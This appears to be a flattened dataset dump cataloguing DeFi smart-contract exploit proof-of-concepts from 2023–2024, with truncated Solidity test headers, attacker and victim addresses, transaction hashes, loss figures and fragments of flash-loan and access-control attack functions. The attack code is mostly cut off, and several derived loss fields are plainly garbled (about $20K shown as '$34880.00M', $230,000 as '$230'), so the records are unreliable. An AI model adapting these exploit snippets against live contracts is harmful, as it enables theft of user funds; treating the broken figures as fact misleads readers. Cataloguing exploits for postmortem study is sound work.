// @KeyInfo - Total Lost : ~3.25M USD$
// Attacker : https://etherscan.io/address/0x8d67db0b205e32a5dd96145f022fa18aae7dc8aa
// Attack Contract : https://etherscan.io/address/0x743599ba5cfa3ce8c59... | exploit_poc | Conic | 2023-07 | Conic_exp.sol | flash_loan | 8c6190ff8008f2fe | 2026-01-07T10:59:16.510670 | postmortems | ethereum | 17,740,954 | ~3.25M USD$ | 3,250,000 | https://etherscan.io/address/0x8d67db0b205e32a5dd96145f022fa18aae7dc8aa | https://etherscan.io/address/0x743599ba5cfa3ce8c59691af5ef279aaafa2e4eb | https://etherscan.io/address/0xbb787d6243a8d450659e09ea6fd82f1c859691e9 | https://etherscan.io/tx/0x8b74995d1d61d3d7547575649136b8765acb22882960f0636941c44ec7bbe146 | https://medium.com/@ConicFinance/post-mortem-eth-and-crvusd-omnipool-exploits-c9c7fa213a3d | https://twitter.com/BlockSecTeam/status/1682356244299010049 | true | true | true | critical | ~3.25M USD$ | flash-loan | false | ~3.25M USD$ | https://etherscan.io/address/0x8d67db0b205e32a5dd96145f022fa18aae7dc8aa | https://etherscan.io/address/0x743599ba5cfa3ce8c59691af5ef279aaafa2e4eb | https://etherscan.io/address/0xbb787d6243a8d450659e09ea6fd82f1c859691e9 | https://etherscan.io/tx/0x8b74995d1d61d3d7547575649136b8765acb22882960f0636941c44ec7bbe146 | https://medium.com/@ConicFinance/post-mortem-eth-and-crvusd-omnipool-exploits-c9c7fa213a3d | https://twitter.com/BlockSecTeam/status/1682356244299010049 | $3.25M | 8 | high | Conic Exploit (2023-07) | true | true | true | true | |
// SPDX-License-Identifier: UNLICENSED
pragma solidity ^0.8.10;
import "forge-std/Test.sol";
import "./../interface.sol";
// @KeyInfo - Total Lost : ~$69K
// Attacker : https://etherscan.io/address/0x85d231c204b82915c909a05847cca8557164c75e
// Vulnerable Contract : https://etherscan.io/address/0x8189afbe7b0e81dae735e... | exploit_poc | AzukiDAO | 2023-07 | AzukiDAO_exp.sol | null | 127e1af9046f6f94 | 2026-01-07T10:59:16.510750 | postmortems | ethereum | 17,593,308 | ~$69K | 69,000 | https://etherscan.io/address/0x85d231c204b82915c909a05847cca8557164c75e | null | https://etherscan.io/address/0x8189afbe7b0e81dae735ef027cd31371b3974feb | https://etherscan.io/tx/0x6233c9315dd3b6a6fcc7d653f4dca6c263e684a76b4ad3d93595e3b8e8714d34 | null | null | true | true | false | medium | ~$69K | unknown | function testExploit() public {
deal(address(Bean), azukiDAOExploiter, 0);
emit log_named_decimal_uint(
"Attacker balance of Bean token before exploit", Bean.balanceOf(azukiDAOExploiter), Bean.decimals()
);
// Arguments for the claim() function calls
// Signature: sen... | true | ~$69K | https://etherscan.io/address/0x85d231c204b82915c909a05847cca8557164c75e | https://etherscan.io/address/0x8189afbe7b0e81dae735ef027cd31371b3974feb | https://etherscan.io/tx/0x6233c9315dd3b6a6fcc7d653f4dca6c263e684a76b4ad3d93595e3b8e8714d34 | $69.0K | 7.71 | medium | AzukiDAO Exploit (2023-07) | true | true | true | false | |||
// SPDX-License-Identifier: UNLICENSED
pragma solidity ^0.8.10;
import "forge-std/Test.sol";
import "./../interface.sol";
// @KeyInfo - Total Lost : ~51K USD$
// Attacker : https://snowtrace.io/address/0xc64afc460290ed3df848f378621b96cb7179521a
// Attack Contract : https://snowtrace.io/address/0x16a3c9e492dee1503f46d... | exploit_poc | Platypus02 | 2023-07 | Platypus02_exp.sol | flash_loan | 90c58fba4a879141 | 2026-01-07T10:59:16.510796 | postmortems | polygon | 32,470,736 | ~51K USD$ | 51,000 | https://snowtrace.io/address/0xc64afc460290ed3df848f378621b96cb7179521a | https://snowtrace.io/address/0x16a3c9e492dee1503f46dea84c52c6a0608f1ed8 | https://polygonscan.com/address/0x9c80a455ecaca7025a45f5fa3b85fd6a462a447b | https://snowtrace.io/tx/0x4b544e5ffb0420977dacb589a6fb83e25347e0685275a3327ee202449b3bfac6 | null | https://twitter.com/peckshield/status/1678800450303164431 | true | true | true | medium | ~51K USD$ | flash-loan | function testExploit() public {
aaveV3.flashLoanSimple(address(this), address(USDC), 85_000 * 1e6, new bytes(0), 0);
emit log_named_decimal_uint(
"Attacker USDC balance after exploit", USDC.balanceOf(address(this)), USDC.decimals()
);
} | true | ~51K USD$ | https://snowtrace.io/address/0xc64afc460290ed3df848f378621b96cb7179521a | https://snowtrace.io/address/0x16a3c9e492dee1503f46dea84c52c6a0608f1ed8 | https://polygonscan.com/address/0x9c80a455ecaca7025a45f5fa3b85fd6a462a447b | https://snowtrace.io/tx/0x4b544e5ffb0420977dacb589a6fb83e25347e0685275a3327ee202449b3bfac6 | https://twitter.com/peckshield/status/1678800450303164431 | $51.0K | 8.93 | high | Platypus02 Exploit (2023-07) | true | true | true | false | |
// SPDX-License-Identifier: UNLICENSED
pragma solidity ^0.8.10;
import "forge-std/Test.sol";
import "./../interface.sol";
// @KeyInfo - Total Lost : ~165K USD$
// Attacker : https://etherscan.io/address/0xc0ccff0b981b419e6e47560c3659c5f0b00e4985
// Attack Contract : https://etherscan.io/address/0xf466f9f431aea853040e... | exploit_poc | Civfund | 2023-07 | Civfund_exp.sol | access_control | 01b9234cd11181e5 | 2026-01-07T10:59:16.510868 | postmortems | ethereum | 17,646,141 | ~165K USD$ | 165,000 | https://etherscan.io/address/0xc0ccff0b981b419e6e47560c3659c5f0b00e4985 | https://etherscan.io/address/0xf466f9f431aea853040ef837626b1c59cc963ce2 | https://etherscan.io/address/0x7caec5e4a3906d0919895d113f7ed9b3a0cbf826 | https://etherscan.io/tx/0xc42fc0e22a0f60cc299be80eb0c0ddce83c21c14a3dddd8430628011c3e20d6b | null | null | true | true | true | high | ~165K USD$ | access-control | function testExploit() public {
// Step 1. Call vulnerable contract function which have no access controll
for (uint256 i; i < victims.length; ++i) {
callVulnerableContract();
}
emit log_named_decimal_uint(
"Attacker USDT balance after exploit", USDT.balanceOf(ad... | true | ~165K USD$ | https://etherscan.io/address/0xc0ccff0b981b419e6e47560c3659c5f0b00e4985 | https://etherscan.io/address/0xf466f9f431aea853040ef837626b1c59cc963ce2 | https://etherscan.io/address/0x7caec5e4a3906d0919895d113f7ed9b3a0cbf826 | https://etherscan.io/tx/0xc42fc0e22a0f60cc299be80eb0c0ddce83c21c14a3dddd8430628011c3e20d6b | $165.0K | 10 | high | Civfund Exploit (2023-07) | true | true | true | false | ||
// SPDX-License-Identifier: UNLICENSED
pragma solidity ^0.8.10;
import "forge-std/Test.sol";
import "./../interface.sol";
// @KeyInfo - Total Lost : ~110K USD$
// Attacker : https://bscscan.com/address/0xcc8617331849962c27f91859578dc91922f6f050
// Attack Contract : https://bscscan.com/address/0xb31c7b7bdf69554345e47a... | exploit_poc | FFIST | 2023-07 | FFIST_exp.sol | null | 19e4ade56729c83e | 2026-01-07T10:59:16.510935 | postmortems | bsc | 30,113,117 | ~110K USD$ | 110,000 | https://bscscan.com/address/0xcc8617331849962c27f91859578dc91922f6f050 | https://bscscan.com/address/0xb31c7b7bdf69554345e47a4393f53c332255c9fb | https://bscscan.com/address/0x80121da952a74c06adc1d7f85a237089b57af347 | https://bscscan.com/tx/0x199c4b88cab6b4b495b9d91af98e746811dd8f82f43117c48205e6332db9f0e0 | null | https://twitter.com/Phalcon_xyz/status/1681869807698984961 | true | true | false | high | ~110K USD$ | unknown | false | ~110K USD$ | https://bscscan.com/address/0xcc8617331849962c27f91859578dc91922f6f050 | https://bscscan.com/address/0xb31c7b7bdf69554345e47a4393f53c332255c9fb | https://bscscan.com/address/0x80121da952a74c06adc1d7f85a237089b57af347 | https://bscscan.com/tx/0x199c4b88cab6b4b495b9d91af98e746811dd8f82f43117c48205e6332db9f0e0 | https://twitter.com/Phalcon_xyz/status/1681869807698984961 | $110.0K | 5.52 | medium | FFIST Exploit (2023-07) | true | true | true | false | ||
// SPDX-License-Identifier: UNLICENSED
pragma solidity ^0.8.10;
import "forge-std/Test.sol";
import "./../interface.sol";
// @KeyInfo - Total Lost : ~8K USD$
// Attacker : https://bscscan.com/address/0x547fb3db0f13eed5d3ff930a0b61ae35b173b4b5
// Attack Contract : https://bscscan.com/address/0x9be508ce41ae5795e1ebc247... | exploit_poc | SUT | 2023-07 | SUT_exp.sol | flash_loan | 585115a15cecd62f | 2026-01-07T10:59:16.510978 | postmortems | bsc | 30,165,901 | ~8K USD$ | 8,000 | https://bscscan.com/address/0x547fb3db0f13eed5d3ff930a0b61ae35b173b4b5 | https://bscscan.com/address/0x9be508ce41ae5795e1ebc247101c40da7d5742db | https://bscscan.com/address/0xf075c5c7ba59208c0b9c41afccd1f60da9ec9c37 | https://bscscan.com/tx/0xfa1ece5381b9e2b2b83cb10faefde7632ca411bb38dd6bafe1f1140b1360f6ae | null | null | true | true | true | low | ~8K USD$ | flash-loan | function testExploit() public {
// Start with 0 BNB
deal(address(this), 0 ether);
// Take 10 WBNB loan
DPPOracle.flashLoan(10e18, 0, address(this), new bytes(1));
emit log_named_decimal_uint(
"Attacker WBNB balance after exploit", WBNB.balanceOf(address(this)), WBNB.... | true | ~8K USD$ | https://bscscan.com/address/0x547fb3db0f13eed5d3ff930a0b61ae35b173b4b5 | https://bscscan.com/address/0x9be508ce41ae5795e1ebc247101c40da7d5742db | https://bscscan.com/address/0xf075c5c7ba59208c0b9c41afccd1f60da9ec9c37 | https://bscscan.com/tx/0xfa1ece5381b9e2b2b83cb10faefde7632ca411bb38dd6bafe1f1140b1360f6ae | $8.0K | 8.85 | high | SUT Exploit (2023-07) | true | true | true | false | ||
// SPDX-License-Identifier: UNLICENSED
pragma solidity ^0.8.10;
import "forge-std/Test.sol";
import "./../interface.sol";
// @KeyInfo - Total Lost : ~400K USD$
// Attacker : https://optimistic.etherscan.io/address/0xd3641c912a6a4c30338787e3c464420b561a9467
// Attack Contract : https://optimistic.etherscan.io/address/... | exploit_poc | ArcadiaFi | 2023-07 | ArcadiaFi_exp.sol | flash_loan | ecd73db8a518479e | 2026-01-07T10:59:16.511032 | postmortems | ethereum | 106,676,494 | ~400K USD$ | 400,000 | https://optimistic.etherscan.io/address/0xd3641c912a6a4c30338787e3c464420b561a9467 | https://optimistic.etherscan.io/address/0x01a4d9089c243ccaebe40aa224ad0cab573b83c6 | https://optimistic.etherscan.io/address/0x13c0ef5f1996b4f119e9d6c32f5e23e8dc313109 | https://optimistic.etherscan.io/tx/0xca7c1a0fde444e1a68a8c2b8ae3fb76ec384d1f7ae9a50d26f8bfdd37c7a0afe | https://arcadiafinance.medium.com/post-mortem-72e9d24a79b0 | https://twitter.com/Phalcon_xyz/status/1678250590709899264 | true | true | true | high | ~400K USD$ | flash-loan | false | ~400K USD$ | https://optimistic.etherscan.io/address/0xd3641c912a6a4c30338787e3c464420b561a9467 | https://optimistic.etherscan.io/address/0x01a4d9089c243ccaebe40aa224ad0cab573b83c6 | https://optimistic.etherscan.io/address/0x13c0ef5f1996b4f119e9d6c32f5e23e8dc313109 | https://optimistic.etherscan.io/tx/0xca7c1a0fde444e1a68a8c2b8ae3fb76ec384d1f7ae9a50d26f8bfdd37c7a0afe | https://arcadiafinance.medium.com/post-mortem-72e9d24a79b0 | https://twitter.com/Phalcon_xyz/status/1678250590709899264 | $400.0K | 8 | high | ArcadiaFi Exploit (2023-07) | true | true | true | true | |
// SPDX-License-Identifier: UNLICENSED
pragma solidity ^0.8.15;
import "../basetest.sol";
// @KeyInfo - Total Lost : $230,000
// Attacker : https://etherscan.io/address/0x02DBE46169fDf6555F2A125eEe3dce49703b13f5
// Attack Contract : https://etherscan.io/address/0x4095F064B8d3c3548A3bebfd0Bbfd04750E30077
// Vulnerable... | exploit_poc | MorphoBlue | 2024-10 | MorphoBlue_exp.sol | flash_loan | 30e2cf4d29e8aac6 | 2026-01-07T10:59:16.511115 | postmortems | ethereum | null | $230,000 | 230 | https://etherscan.io/address/0x02DBE46169fDf6555F2A125eEe3dce49703b13f5 | https://etherscan.io/address/0x4095F064B8d3c3548A3bebfd0Bbfd04750E30077 | https://etherscan.io/address/0xBBBBBbbBBb9cC5e90e3b3Af64bdAF62C37EEFFCb | https://etherscan.io/tx/0x256979ae169abb7fbbbbc14188742f4b9debf48b48ad5b5207cadcc99ccb493b | null | https://x.com/omeragoldberg/status/1845515843787960661 | true | true | true | low | $230,000 | flash-loan | function testExploit() public balanceLog {
// Initiate a flash loan of PAXG from the Uniswap V2 pair
IUniswapV2Pair(PAXG_WETH_V2_PAIR).swap(PAXG_FLASHLOAN_AMOUNT, 0, address(this), new bytes(100));
//At the end we swap any PAXG if remaining to USDC
uint256 paxgBal = TokenHelper.getTokenB... | true | $230,000 | https://etherscan.io/address/0x02DBE46169fDf6555F2A125eEe3dce49703b13f5 | https://etherscan.io/address/0x4095F064B8d3c3548A3bebfd0Bbfd04750E30077 | https://etherscan.io/address/0xBBBBBbbBBb9cC5e90e3b3Af64bdAF62C37EEFFCb | https://etherscan.io/tx/0x256979ae169abb7fbbbbc14188742f4b9debf48b48ad5b5207cadcc99ccb493b | https://x.com/omeragoldberg/status/1845515843787960661 | $230 | 10 | high | MorphoBlue Exploit (2024-10) | true | true | true | false | |
// SPDX-License-Identifier: UNLICENSED
pragma solidity ^0.8.13;
import "forge-std/Test.sol";
import "../interface.sol";
// @KeyInfo - Total Lost : 34.88 BNB (~$20K USD)
// Attacker : https://bscscan.com/address/0x3026c464d3bd6ef0ced0d49e80f171b58176ce32
// Attack Contract : https://bscscan.com/address/0x8408497c18882... | exploit_poc | AIZPTToken | 2024-10 | AIZPTToken_exp.sol | null | 06f624ea7e20687b | 2026-01-07T10:59:16.511201 | postmortems | bsc | 42,846,998 | 34.88 BNB (~$20K USD) | 34,880,000,000 | https://bscscan.com/address/0x3026c464d3bd6ef0ced0d49e80f171b58176ce32 | https://bscscan.com/address/0x8408497c18882bfb61be9204cfff530f4ee18320 | https://bscscan.com/address/0xbe779d420b7d573c08eee226b9958737b6218888 | https://bscscan.com/tx/0x5e694707337cca979d18f9e45f40e81d6ca341ed342f1377f563e779a746460d | null | null | true | false | false | critical | 34.88 BNB (~$20K USD) | unknown | function testPoC() public {
vm.startPrank(attacker);
AttackerC attackerC = new AttackerC();
vm.label(address(attackerC), "attackerC");
attackerC.attack();
console.log("Final balance in wBNB :", IERC20(weth).balanceOf(attacker));
}
}
contract AttackerC { | true | 34.88 BNB (~$20K USD) | https://bscscan.com/address/0x3026c464d3bd6ef0ced0d49e80f171b58176ce32 | https://bscscan.com/address/0x8408497c18882bfb61be9204cfff530f4ee18320 | https://bscscan.com/address/0xbe779d420b7d573c08eee226b9958737b6218888 | https://bscscan.com/tx/0x5e694707337cca979d18f9e45f40e81d6ca341ed342f1377f563e779a746460d | $34880.00M | 7.16 | medium | AIZPTToken Exploit (2024-10) | true | true | true | false | ||
// SPDX-License-Identifier: UNLICENSED
pragma solidity ^0.8.15;
import "../basetest.sol";
// @KeyInfo - Total Lost : $14,773.35
// Attacker : https://etherscan.io/address/0xfde0d1575ed8e06fbf36256bcdfa1f359281455a
// Attack Contract : https://etherscan.io/address/0x6980a47bee930a4584b09ee79ebe46484fbdbdd0
// Vulnerab... | exploit_poc | Erc20transfer | 2024-10 | Erc20transfer_exp.sol | null | 6add43aadcf846d8 | 2026-01-07T10:59:16.511243 | postmortems | ethereum | null | $14,773.35 | 14 | https://etherscan.io/address/0xfde0d1575ed8e06fbf36256bcdfa1f359281455a | https://etherscan.io/address/0x6980a47bee930a4584b09ee79ebe46484fbdbdd0 | https://etherscan.io/address/0x43dc865e916914fd93540461fde124484fbf8faa | https://etherscan.io/tx/0x7f2540af4a1f7b0172a46f5539ebf943dd5418422e4faa8150d3ae5337e92172 | https://x.com/d23e_AG/status/1849064161017225645 | https://x.com/d23e_AG/status/1849064161017225645 | true | true | false | low | $14,773.35 | unknown | function testExploit() public balanceLog {
I(0x43Dc865E916914FD93540461FdE124484FBf8fAa).erc20TransferFrom(
0xA0b86991c6218b36c1d19D4a2e9Eb0cE3606eB48, address(this), 0x3DADf003AFCC96d404041D8aE711B94F8C68c6a5, 0
);
} | true | $14,773.35 | https://etherscan.io/address/0xfde0d1575ed8e06fbf36256bcdfa1f359281455a | https://etherscan.io/address/0x6980a47bee930a4584b09ee79ebe46484fbdbdd0 | https://etherscan.io/address/0x43dc865e916914fd93540461fde124484fbf8faa | https://etherscan.io/tx/0x7f2540af4a1f7b0172a46f5539ebf943dd5418422e4faa8150d3ae5337e92172 | https://x.com/d23e_AG/status/1849064161017225645 | https://x.com/d23e_AG/status/1849064161017225645 | $14 | 6.81 | medium | Erc20transfer Exploit (2024-10) | true | true | true | true |
// SPDX-License-Identifier: UNLICENSED
pragma solidity ^0.8.13;
import "forge-std/Test.sol";
import "../interface.sol";
// @KeyInfo - Total Lost : 1 USDC, 125795.6 cUSDC, 0,0067 WBTC, 2.25 WETH (~$130K USD)
// Attacker : https://arbiscan.io/address/0x8a0dfb61cad29168e1067f6b23553035d83fcfb2
// Attack Contract : https... | exploit_poc | LavaLending | 2024-10 | LavaLending_exp.sol | flash_loan | 78fc1eab69666b17 | 2026-01-07T10:59:16.511294 | postmortems | arbitrum | 259,645,908 | 1 USDC, 125795.6 cUSDC, 0,0067 WBTC, 2.25 WETH (~$130K USD) | 1 | https://arbiscan.io/address/0x8a0dfb61cad29168e1067f6b23553035d83fcfb2 | https://arbiscan.io/address/0x69fa61eb4dc4e07263d401b01ed1cfceb599dab8#code | https://arbiscan.io/address/0x6700b021a8bcfae25a2493d16d7078c928c13151 | https://arbiscan.io/tx/0xb5cfa4ae4d6e459ba285fec7f31caf8885e2285a0b4ff62f66b43e280c947216 | null | null | true | false | true | low | 1 USDC, 125795.6 cUSDC, 0,0067 WBTC, 2.25 WETH (~$130K USD) | flash-loan | function testPoC() public {
vm.startPrank(attacker);
AttackerC attackerC = new AttackerC();
vm.label(address(attackerC), "attackerC");
attackerC.attack();
console.log("Final balance in usdc :", IERC20(usdc).balanceOf(attacker));
console.log("Final balance in cUSDC:", IE... | true | 1 USDC, 125795.6 cUSDC, 0,0067 WBTC, 2.25 WETH (~$130K USD) | https://arbiscan.io/address/0x8a0dfb61cad29168e1067f6b23553035d83fcfb2 | https://arbiscan.io/address/0x69fa61eb4dc4e07263d401b01ed1cfceb599dab8#code | https://arbiscan.io/address/0x6700b021a8bcfae25a2493d16d7078c928c13151 | https://arbiscan.io/tx/0xb5cfa4ae4d6e459ba285fec7f31caf8885e2285a0b4ff62f66b43e280c947216 | $1 | 10 | high | LavaLending Exploit (2024-10) | true | true | true | false | ||
// SPDX-License-Identifier: UNLICENSED
pragma solidity ^0.8.13;
import "forge-std/Test.sol";
import "../interface.sol";
// @KeyInfo - Total Lost : ~249 ETH (~$600K USD)
// Attacker : 0x493c5655D40B051a64bc88A6af21D73d3A9B72A2 (Shezmu Attacker 3)
// Attack Contract : https://etherscan.io/address/0x991493900674b10bdf54... | exploit_poc | SASHAToken | 2024-10 | SASHAToken_exp.sol | null | 1ebced9a8cd49a48 | 2026-01-07T10:59:16.511395 | postmortems | ethereum | 20,905,302 | ~249 ETH (~$600K USD) | 249 | null | https://etherscan.io/address/0x991493900674b10bdf54bdfe95b4e043257798cf | null | https://app.blocksec.com/explorer/tx/eth/0xd9fdc7d03eec28fc2453c5fa68eff82d4c297f436a6a5470c54ca3aecd2db17e | null | null | true | true | false | low | ~249 ETH (~$600K USD) | unknown | function testExploit() public {
vm.startPrank(attacker);
SASHAToken_AttackContract attackC = new SASHAToken_AttackContract();
payable(address(attackC)).transfer(0.08 ether);
attackC.attack();
// Simulate withdraw
attackC.withdraw();
vm.stopPrank();
co... | true | ~249 ETH (~$600K USD) | https://etherscan.io/address/0x991493900674b10bdf54bdfe95b4e043257798cf | https://app.blocksec.com/explorer/tx/eth/0xd9fdc7d03eec28fc2453c5fa68eff82d4c297f436a6a5470c54ca3aecd2db17e | $249 | 7.08 | medium | SASHAToken Exploit (2024-10) | true | false | true | false | ||||
// SPDX-License-Identifier: UNLICENSED
pragma solidity ^0.8.13;
import "forge-std/Test.sol";
import "../interface.sol";
// @KeyInfo - Total Lost : 8.45 ETH (~$20K USD)
// Attacker : https://etherscan.io/address/0x81f48a87ec44208c691f870b9d400d9c13111e2e
// Attack Contract : https://etherscan.io/address/0x9776c0abe8ae... | exploit_poc | FireToken | 2024-10 | FireToken_exp.sol | flash_loan | 472fca184941c8cb | 2026-01-07T10:59:16.511446 | postmortems | ethereum | 20,869,375 | 8.45 ETH (~$20K USD) | 8.45 | https://etherscan.io/address/0x81f48a87ec44208c691f870b9d400d9c13111e2e | https://etherscan.io/address/0x9776c0abe8ae3c9ca958875128f1ae1d5afafcb8 | https://etherscan.io/address/0x18775475f50557b96C63E8bbf7D75bFeB412082D | https://etherscan.io/tx/0xd20b3b31a682322eb0698ecd67a6d8a040ccea653ba429ec73e3584fa176ff2b | null | null | true | false | true | low | 8.45 ETH (~$20K USD) | flash-loan | function testPoC() public {
vm.startPrank(attacker);
AttackerC attackerC = new AttackerC();
vm.label(address(attackerC), "attackerC");
attackerC.attack();
console.log("Final balance in WETH:", attacker.balance);
}
}
contract AttackerC { | true | 8.45 ETH (~$20K USD) | https://etherscan.io/address/0x81f48a87ec44208c691f870b9d400d9c13111e2e | https://etherscan.io/address/0x9776c0abe8ae3c9ca958875128f1ae1d5afafcb8 | https://etherscan.io/address/0x18775475f50557b96C63E8bbf7D75bFeB412082D | https://etherscan.io/tx/0xd20b3b31a682322eb0698ecd67a6d8a040ccea653ba429ec73e3584fa176ff2b | $8 | 9.45 | high | FireToken Exploit (2024-10) | true | true | true | false | ||
// SPDX-License-Identifier: UNLICENSED
pragma solidity ^0.8.10;
import "forge-std/Test.sol";
import "../interface.sol";
// reason : price manipulation,mintv2 use wbnb-usdt pair price to mint Token
// guy : https://x.com/TenArmorAlert/status/1844241843518951451
// tx : https://app.blocksec.com/explorer/tx/bsc/0... | exploit_poc | HYDT | 2024-10 | HYDT_exp.sol | null | 36cf4736494f7e1b | 2026-01-07T10:59:16.511502 | postmortems | unknown | 42,985,310 | null | null | null | null | null | null | null | null | false | false | false | medium | null | unknown | false | Unknown | 1.74 | low | HYDT Exploit (2024-10) | false | false | false | false | ||||||||
// SPDX-License-Identifier: UNLICENSED
pragma solidity ^0.8.13;
import "forge-std/Test.sol";
import "../interface.sol";
// @KeyInfo - Total Lost : 547.18 BNB (~$312K USD)
// Attacker : https://bscscan.com/address/0xfeb19ae8c0448f25de43a3afcb7b29c9cef6eff6
// Attack Contract : https://bscscan.com/address/0x3f32c7cfb0a... | exploit_poc | P719Token | 2024-10 | P719Token_exp.sol | null | 5a463ec6bc9261a2 | 2026-01-07T10:59:16.511569 | postmortems | bsc | 43,023,423 | 547.18 BNB (~$312K USD) | 547,179,999,999.99994 | https://bscscan.com/address/0xfeb19ae8c0448f25de43a3afcb7b29c9cef6eff6 | https://bscscan.com/address/0x3f32c7cfb0a78ddea80a2384ceb4633099cbdc98 | https://bscscan.com/token/0x6beee2b57b064eac5f432fc19009e3e78734eabc | https://bscscan.com/tx/0x9afcac8e82180fa5b2f346ca66cf6eb343cd1da5a2cd1b5117eb7eaaebe953b3 | null | null | true | false | false | critical | 547.18 BNB (~$312K USD) | unknown | function testPoC() public {
vm.startPrank(attacker);
AttackerC attackerC = new AttackerC();
vm.label(address(attackerC), "attackerC");
// First the attacker create a owned token
myToken = new MyToken();
// Second create a pair in uniswap with WBNB
vm.deal(attack... | true | 547.18 BNB (~$312K USD) | https://bscscan.com/address/0xfeb19ae8c0448f25de43a3afcb7b29c9cef6eff6 | https://bscscan.com/address/0x3f32c7cfb0a78ddea80a2384ceb4633099cbdc98 | https://bscscan.com/token/0x6beee2b57b064eac5f432fc19009e3e78734eabc | https://bscscan.com/tx/0x9afcac8e82180fa5b2f346ca66cf6eb343cd1da5a2cd1b5117eb7eaaebe953b3 | $547180.00M | 9 | high | P719Token Exploit (2024-10) | true | true | true | false | ||
// SPDX-License-Identifier: UNLICENSED
pragma solidity ^0.8.10;
import "forge-std/Test.sol";
import "../interface.sol";
// reason : flashloan will burn the token, but not check the token is freezed or not
// guy : https://x.com/TenArmorAlert/status/1848403791881900130
// tx : https://app.blocksec.com/explorer/... | exploit_poc | VISTA | 2024-10 | VISTA_exp.sol | flash_loan | 655a88310e0df3c4 | 2026-01-07T10:59:16.511634 | postmortems | unknown | 43,305,237 | null | null | null | null | null | null | null | null | false | false | true | medium | null | flash-loan | false | Unknown | 3.02 | low | VISTA Exploit (2024-10) | false | false | false | false | ||||||||
pragma solidity ^0.8.10;
import "forge-std/Test.sol";
import "../interface.sol";
// @KeyInfo - Total Lost : 131k
// Attacker : https://etherscan.io/address/0xa60fae100d9c3d015c9cd7107f95cbacf58a1cbd
// Attack Contract :
// Vulnerable Contract :
// Attack Tx : https://app.blocksec.com/explorer/tx/eth/0x1b4730e715286... | exploit_poc | BUBAI | 2024-10 | BUBAI_exp.sol | null | 3b25408284f19d51 | 2026-01-07T10:59:16.511688 | postmortems | ethereum | 21,074,245 | 131k | 131,000 | https://etherscan.io/address/0xa60fae100d9c3d015c9cd7107f95cbacf58a1cbd | null | null | https://app.blocksec.com/explorer/tx/eth/0x1b4730e715286862042def956d5aaa6a53203ee02b97ea913de73fa462e48f90?line=0 | https://x.com/TenArmorAlert/status/1851445795918118927 | https://x.com/TenArmorAlert/status/1851445795918118927 | true | true | false | high | 131k | unknown | function testPoC() public {
emit log_named_decimal_uint("before attack: balance of attacker", address(attacker).balance, 18);
vm.startPrank(attacker, attacker);
AttackerC attC = new AttackerC();
vm.stopPrank();
vm.startPrank(UniswapV2Pair);
IORAAI(ORAAI).approve(address(... | true | 131k | https://etherscan.io/address/0xa60fae100d9c3d015c9cd7107f95cbacf58a1cbd | https://app.blocksec.com/explorer/tx/eth/0x1b4730e715286862042def956d5aaa6a53203ee02b97ea913de73fa462e48f90?line=0 | https://x.com/TenArmorAlert/status/1851445795918118927 | https://x.com/TenArmorAlert/status/1851445795918118927 | $131.0K | 6.68 | medium | BUBAI Exploit (2024-10) | true | false | true | true | ||
// SPDX-License-Identifier: UNLICENSED
pragma solidity ^0.8.10;
import "forge-std/Test.sol";
import "./../interface.sol";
// @KeyInfo - Total Lost : ~100K USD$
// Attacker : https://bscscan.com/address/0xee6764ac7aa45ed52482e4320906fd75615ba1d1
// Attack Contract : https://bscscan.com/address/0x9a6b926281b0c7bc4f775e... | exploit_poc | BabyDogeCoin02 | 2023-06 | BabyDogeCoin02_exp.sol | flash_loan | 602aaabbb933e909 | 2026-01-07T10:59:16.511740 | postmortems | bsc | 29,295,010 | ~100K USD$ | 100,000 | https://bscscan.com/address/0xee6764ac7aa45ed52482e4320906fd75615ba1d1 | https://bscscan.com/address/0x9a6b926281b0c7bc4f775e81f42b13eda9c1c98e | https://bscscan.com/address/0xc748673057861a797275CD8A068AbB95A902e8de | https://bscscan.com/tx/0xbaf3e4841614eca5480c63662b41cd058ee5c85dc69198b29e7ab63b84bc866c | null | https://twitter.com/hexagate_/status/1671517819840745475 | true | true | true | high | ~100K USD$ | flash-loan | function testExploit() public {
init();
AddBabyDogeCoinWBNBLiquidity();
exploit();
emit log_named_decimal_uint(
"Attacker WBNB balance after exploit", WBNB.balanceOf(address(this)), WBNB.decimals()
);
} | true | ~100K USD$ | https://bscscan.com/address/0xee6764ac7aa45ed52482e4320906fd75615ba1d1 | https://bscscan.com/address/0x9a6b926281b0c7bc4f775e81f42b13eda9c1c98e | https://bscscan.com/address/0xc748673057861a797275CD8A068AbB95A902e8de | https://bscscan.com/tx/0xbaf3e4841614eca5480c63662b41cd058ee5c85dc69198b29e7ab63b84bc866c | https://twitter.com/hexagate_/status/1671517819840745475 | $100.0K | 10 | high | BabyDogeCoin02 Exploit (2023-06) | true | true | true | false | |
// SPDX-License-Identifier: UNLICENSED
pragma solidity ^0.8.10;
// @KeyInfo - Total Lost : ~13 $ETH
// Attacker : https://bscscan.com/address/0xc7823188d459e1744c0e5fd58a0e074e92982ea3
// Attack Contract : https://bscscan.com/address/0xc7823188d459e1744c0e5fd58a0e074e92982ea3
// Vulnerable Contract : https://bscscan.c... | exploit_poc | STRAC | 2023-06 | STRAC_exp.sol | null | a5ef48f3bcaa0b27 | 2026-01-07T10:59:16.511815 | postmortems | bsc | 29,474,566 | ~13 $ETH | 13 | https://bscscan.com/address/0xc7823188d459e1744c0e5fd58a0e074e92982ea3 | https://bscscan.com/address/0xc7823188d459e1744c0e5fd58a0e074e92982ea3 | https://bscscan.com/address/0x1f90bdeb5674833868ee9b36707b929024e7a513 | https://bscscan.com/tx/0x1147b3c0f3ebdd524c4e58430bb736eba9f7fa522158f5ad81eb3e2394b466d0 | null | null | true | false | false | low | ~13 $ETH | unknown | function testExploit() public {
STRAC.approve(address(PancakeRouter), type(uint256).max);
emit log_named_decimal_uint("Attacker ETH balance before attack", ETH.balanceOf(address(this)), 18);
Contract_0x1f90.call(
abi.encodeWithSelector(bytes4(0x4a75084c), address(this), STRAC, STRAC.... | true | ~13 $ETH | https://bscscan.com/address/0xc7823188d459e1744c0e5fd58a0e074e92982ea3 | https://bscscan.com/address/0xc7823188d459e1744c0e5fd58a0e074e92982ea3 | https://bscscan.com/address/0x1f90bdeb5674833868ee9b36707b929024e7a513 | https://bscscan.com/tx/0x1147b3c0f3ebdd524c4e58430bb736eba9f7fa522158f5ad81eb3e2394b466d0 | $13 | 7.21 | medium | STRAC Exploit (2023-06) | true | true | true | false | ||
// SPDX-License-Identifier: UNLICENSED
pragma solidity ^0.8.10;
import "forge-std/Test.sol";
import "./../interface.sol";
// @KeyInfo - Total Lost : ~36K USD$ (LEVUSDC) + ~69K USD$ (DEPUSDT)
